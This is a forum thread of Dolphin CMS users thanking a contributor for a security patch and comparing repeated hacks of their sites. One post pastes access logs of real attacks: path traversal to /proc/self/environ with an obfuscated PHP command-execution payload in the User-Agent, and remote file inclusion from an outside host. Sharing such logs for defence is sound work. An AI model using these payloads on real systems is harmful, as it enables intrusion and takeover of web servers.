Fix for dolphin exploit

Thank you so very much ...

you are most welcome sweetie, hey it was only $30 so well worth it to make sure i dont get hacked too, but they looked over my server and told me its secure and that fix will kill remote attack attempts on dolphin. as soon as i tested my site still works and can still upload and post on the forums, its cool i posted it here.

thanks for sharing!!! :D

Sammy, good :)
PS we involved to making fast-fix-patch that close all such holes in security for old PHP versions to prevent change variables via GET params, or if register globals is On,
Also we close another security holes (just because here not only this way to hack any sites)
I spend several days and found many ways to hack any sites. So register globals and all fixes above just more simpliest and old way :)

Sammie, thanks, hopefully we can return the favor down the road!

DoLaugh

Thanks a lot Sammie! First i thought its another "how to safe my site" post as the others. ;) But it contains new informations on how to ge rid of some hackers. Thanks for your share! Ill update my files!

Greets,
Jerry

Sammie, many thanks. Very generous!!

All the best.

Stuart
Ps. what was that about questionable code...?

don't forget also to thank all folks out there who spend some time, just to keep your websites clean and clear from any bugs and intruders! :)

thanks you the best

Thanks for posting this. Even if it's not the official patch maybe it will help a few folks while we await the official word. Any time something like this is posted I'm certainly going to look into it and check it out. Thanks Again!!

there is another exploit found that can affect sites with register globals off, i am hoping to have a patch for this tomorrow. boonex have been informed so hope they can include it in their patch, but it might delay their patch a little longer

Thank you Sammie!

Thanks for the tip

Thanks Sammie!

Sammie:
thanks for the code mod snippets.
I work at hfw and am attempting to put this to use on one of the Dolphin installs that repeatedly gets suspended from RFI injections, etc...(seems like all I do is chase this exploit around.)

boonex says it's our register_globals=on on our VPSs.
We'd like to think it's the 777 perm'd directories
but I have seen RFIs even with it off.

Believe me, I want to see this activity solved once and for all.
I remain hopeful.

You mentioned "here is another exploit found" : can you elaborate, if not openly then some other way?

My index.php was hacked.

Trying this mod now. My site has been hacked several times after the dolphin security fix. I have followed all security instructions and keeping getting hacked through Boonex scripts.

hack code used on my site,

//plugins/safehtml/safehtml.php?dir[plugins]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 617 "-" "<? $x0e=\"\\145x\\x65\\x63\"; $x0f=\"\\x66eo\\146\"; $x10=\"\\x66\\x72ea\\x64\"; $x11=\"\\146un\\x63\\164io\\x6e\\x5f\\x65x\\151s\\x74\\x73\"; $x12=\"i\\163\\x5f\\162\\x65s\\157ur\\x63\\x65\"; $x13=\"\\152\\157\\x69\\156\"; $x14=\"o\\142_g\\145t\\x5f\\x63o\\156\\164en\\x74\\x73\"; $x15=\"ob\\137\\x65\\156d\\137\\x63lea\\156\"; $x16=\"\\x6fb_st\\x61\\x72\\164\"; $x17=\"\\x70\\141\\163s\\164\\x68\\162\\165\"; $x18=\"\\x70\\143\\154ose\"; $x19=\"p\\157\\160e\\x6e\"; $x1a=\"\\163h\\145\\154l\\137\\x65\\170e\\143\"; $x1b=\"\\x73\\x79s\\x74e\\x6d\"; function x0b($x0b){ global $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b,$x0c);$x0c = $x13(\"\\n\",$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b,\"\\x72\"))){ $x0c = \"\"; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);} } return $x0c;}echo x0b(\"ec\\150\\157\\x20c\\1624n\\153\\137\\x72oc\\153s\");?>"

more

83.64.48.195 - - [19/Sep/2008:20:38:46 -0400] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.vogelgesang-av.de/cache/DONTDELETEFAGOT/i??? HTTP/1.1" 200 638 "-" "http://cr4nk.ws/ [de] (Windows 3.1; I) [crank]"
83.64.48.195 - - [19/Sep/2008:20:38:46 -0400] "GET /errors.php?error=http://www.vogelgesang-av.de/cache/DONTDELETEFAGOT/i??? HTTP/1.1" 404 1550 "-" "http://cr4nk.ws/ [de] (Windows 3.1; I) [crank]"
83.64.48.195 - - [19/Sep/2008:20:38:47 -0400] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 638 "-" "<? $x0e=\"\\145x\\x65\\x63\"; $x0f=\"\\x66eo\\146\"; $x10=\"\\x66\\x72ea\\x64\"; $x11=\"\\146un\\x63\\164io\\x6e\\x5f\\x65x\\151s\\x74\\x73\"; $x12=\"i\\163\\x5f\\162\\x65s\\157ur\\x63\\x65\"; $x13=\"\\152\\157\\x69\\156\"; $x14=\"o\\142_g\\145t\\x5f\\x63o\\156\\164en\\x74\\x73\"; $x15=\"ob\\137\\x65\\156d\\137\\x63lea\\156\"; $x16=\"\\x6fb_st\\x61\\x72\\164\"; $x17=\"\\x70\\141\\163s\\164\\x68\\162\\165\"; $x18=\"\\x70\\143\\154ose\"; $x19=\"p\\157\\160e\\x6e\"; $x1a=\"\\163h\\145\\154l\\137\\x65\\170e\\143\"; $x1b=\"\\x73\\x79s\\x74e\\x6d\"; function x0b($x0b){ global $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b,$x0c);$x0c = $x13(\"\\n\",$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b,\"\\x72\"))){ $x0c = \"\"; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);} } return $x0c;}echo x0b(\"ec\\150\\157\\x20c\\1624n\\153\\137\\x72oc\\153s\");?>"
83.64.48.195 - - [19/Sep/2008:20:38:48 -0400] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 638 "-" "<? $x0e=\"\\145x\\x65\\x63\"; $x0f=\"\\x66eo\\146\"; $x10=\"\\x66\\x72ea\\x64\"; $x11=\"\\146un\\x63\\164io\\x6e\\x5f\\x65x\\151s\\x74\\x73\"; $x12=\"i\\163\\x5f\\162\\x65s\\157ur\\x63\\x65\"; $x13=\"\\152\\157\\x69\\156\"; $x14=\"o\\142_g\\145t\\x5f\\x63o\\156\\164en\\x74\\x73\"; $x15=\"ob\\137\\x65\\156d\\137\\x63lea\\156\"; $x16=\"\\x6fb_st\\x61\\x72\\164\"; $x17=\"\\x70\\141\\163s\\164\\x68\\162\\165\"; $x18=\"\\x70\\143\\154ose\"; $x19=\"p\\157\\160e\\x6e\"; $x1a=\"\\163h\\145\\154l\\137\\x65\\170e\\143\"; $x1b=\"\\x73\\x79s\\x74e\\x6d\"; function x0b($x0b){ global $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b,$x0c);$x0c = $x13(\"\\n\",$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b,\"\\x72\"))){ $x0c = \"\"; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);} } return $x0c;}echo x0b(\"ec\\150\\157\\x20c\\1624n\\153\\137\\x72oc\\153s\");?>"

more

/ray/XML.php?action=getSettingValue&key=status&widget=youtube&file=main&_t=19

more
POSSIBLE

/plugins/tiny_mce/tiny_mce_gzip.php?js=true&diskcache=true&core=true&suffix=&themes=simple%2Cadvanced&plugins=style%2Clayer%2Ctable%2Csave%2Cadvhr%2Cadvimage%2Cadvlink%2Cemotions%2Ciespell%2Cinsertdatetime%2Cpreview%2Cmedia%2Csearchreplace%2Cprint%2Ccontextmenu%2Cpaste%2Cdirectionality%2Cfullscreen%2Cnoneditable%2Cvisualchars%2Cnonbreaking%2Cxhtmlxtras&languages=en

thx sammie, no troubles yet, but hope to keep it this way. thx for sharing.